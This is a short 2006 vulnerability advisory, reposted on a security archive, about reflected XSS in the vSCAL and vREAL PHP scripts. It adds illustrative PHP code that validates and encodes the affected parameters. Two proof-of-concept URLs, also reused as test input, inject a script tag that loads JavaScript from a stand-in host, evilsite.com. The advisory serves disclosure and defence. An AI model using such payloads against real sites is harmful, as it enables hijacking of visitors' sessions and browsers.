Computer Security
[EN] securityvulns.ru



From: luny_(at)_youfucktard.com <luny_(at)_youfucktard.com>
Date: 09.06.2006
Subject: Babykatmedia.com scripts - vSCAL & vREAL - XSS Vulns

vSCAL and vREAL v1.0

Homepage:
http://www.babykatiemedia.com/

Affected files:
index.php
myslideshow.php

XSS Vulnerability via lid variable:
http://www.example.com/vscal/index.php?page=showlisting&lid=<SCRIPT%20SRC=evilsite.com//xss.js></SCRIPT>

XSS Vulnerability via myslideshow.php

http://www.example.com/vscal/myslideshow.php?dir=./listings/317/images/&title=listing+317:+1966+Buick+<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>
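
Server-side handling that stops both reflections reported above, added here as an illustration: it is not part of the original post and is not vSCAL/vREAL code. The function names, the output markup, and the assumption that lid is a positive integer listing id are hypothetical.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-ins for the two sinks named in the advisory.
// The vSCAL/vREAL source is not shown on the page; all names are assumptions.

/** Encode untrusted text for an HTML text node or a quoted attribute value. */
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Assumption: lid is a positive integer (the advisory's sample is listing 317). */
function parse_lid($raw): ?int
{
    if (!is_string($raw)) {            // rejects arrays sent as lid[]=...
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Stand-in for index.php?page=showlisting&lid=... */
function render_listing(array $query): string
{
    $lid = parse_lid($query['lid'] ?? null);
    if ($lid === null) {
        return '<p>Invalid listing id.</p>';   // never reflect the raw value
    }
    return '<h1>Listing ' . $lid . '</h1>';     // an int is safe to emit
}

/** Stand-in for myslideshow.php?title=... (free text, so encode on output). */
function render_slideshow_title(array $query): string
{
    $title = $query['title'] ?? '';
    if (!is_string($title)) {
        $title = '';
    }
    return '<title>' . h($title) . '</title>';
}

// Constructed inputs mirroring the two requests in the advisory.
$payload = '<SCRIPT SRC=http://evilsite.com/xss.js></SCRIPT>';
echo render_listing(['lid' => $payload]), "\n";
echo render_listing(['lid' => '317']), "\n";
echo render_slideshow_title(['title' => 'listing 317: 1966 Buick ' . $payload]), "\n";
```

Validation covers lid because its expected type is narrow; title is free text, so it is encoded at output instead of filtered.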

© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


